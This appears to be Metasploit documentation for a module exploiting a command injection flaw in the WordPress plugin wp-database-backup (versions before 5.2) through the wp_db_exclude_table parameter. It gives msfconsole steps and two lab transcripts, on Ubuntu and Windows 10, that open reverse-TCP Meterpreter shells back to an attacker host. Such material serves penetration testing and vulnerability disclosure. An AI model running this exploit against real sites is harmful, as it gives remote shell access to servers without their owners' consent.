## Description

  There exists a command injection vulnerability in the Wordpress plugin `wp-database-backup` for versions < 5.2.
  
  For the backup functionality, the plugin generates a `mysqldump` command to execute. The user can choose specific
  tables to exclude from the backup by setting the `wp_db_exclude_table` parameter in a POST request to the
  `wp-database-backup` page. The names of the excluded tables are included in the `mysqldump` command unsanitized.

  Arbitrary commands injected through the `wp_db_exclude_table` parameter are executed each time the functionality
  for creating a new database backup are run.

## Vulnerable Application

  The `wp-database-backup` plugin < `v5.2`. The plugin can be found [here](https://wordpress.org/plugins/wp-database-backup/).
  Older versions of the software can be found via the `advanced` view on the plugin's main page.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/wp_db_backup_rce```
  4. Do: ```set RHOSTS <ip>```
  5. Do: ```set USERNAME <user>```
  6. Do: ```set PASSWORD <password>```
  7. Do: ```run```
  8. You should get a shell.

## Scenarios

### Tested on wp-database-backup v4.6.5 running Wordpress 5.1 on Ubuntu 18.04

  ```
  msf exploit(multi/http/wp_db_backup_rce) > set target 1
  target => 1
  msf exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.147
  rhosts => 192.168.37.147
  msf exploit(multi/http/wp_db_backup_rce) > set payload linux/x86/meterpreter/reverse_tcp
  payload => linux/x86/meterpreter/reverse_tcp
  msf exploit(multi/http/wp_db_backup_rce) > check

  [*] Version of wp-database-backup detected: 4.6
  [*] 192.168.37.147:80 - The target appears to be vulnerable.
  msf exploit(multi/http/wp_db_backup_rce) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444 
  [+] Reached the wp-database-backup settings page
  [+] Successfully added payload as an excluded table
  [*] Sending stage (985320 bytes) to 192.168.37.147
  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.147:48398) at 2019-06-25 11:05:27 -0500
  [+] Successfully created a backup of the database
  [+] Successfully deleted the database backup
  [+] Successfully deleted the payload from the excluded tables list

  meterpreter > getuid
  Server username: uid=33, gid=33, euid=33, egid=33
  meterpreter > sysinfo
  Computer     : 192.168.37.147
  OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  ```

### Tested on wp-database-backup v4.6.5 running Wordpress 5.2 on Windows 10

  ```
  msf > use exploit/multi/http/wp_db_backup_rce 
  msf exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.144
  rhosts => 192.168.37.144
  msf exploit(multi/http/wp_db_backup_rce) > set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp
  msf exploit(multi/http/wp_db_backup_rce) > set username user
  username => user
  msf exploit(multi/http/wp_db_backup_rce) > set password password
  password => password
  msf exploit(multi/http/wp_db_backup_rce) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf exploit(multi/http/wp_db_backup_rce) > check

  [*] Version of wp-database-backup detected: 4.6
  [*] 192.168.37.144:80 - The target appears to be vulnerable.
  msf exploit(multi/http/wp_db_backup_rce) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444 
  [+] Reached the wp-database-backup settings page
  [+] Successfully added payload as an excluded table
  [*] Sending stage (206403 bytes) to 192.168.37.144
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.144:49844) at 2019-06-25 11:01:22 -0500
  [+] Successfully created a backup of the database
  [+] Successfully deleted the database backup
  [+] Successfully deleted the payload from the excluded tables list

  meterpreter > getuid
  Server username: DESKTOP-RTVVNST\Shelby Pace
  meterpreter > sysinfo
  Computer        : DESKTOP-RTVVNST
  OS              : Windows 10 (Build 16299).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x64/windows
  ```
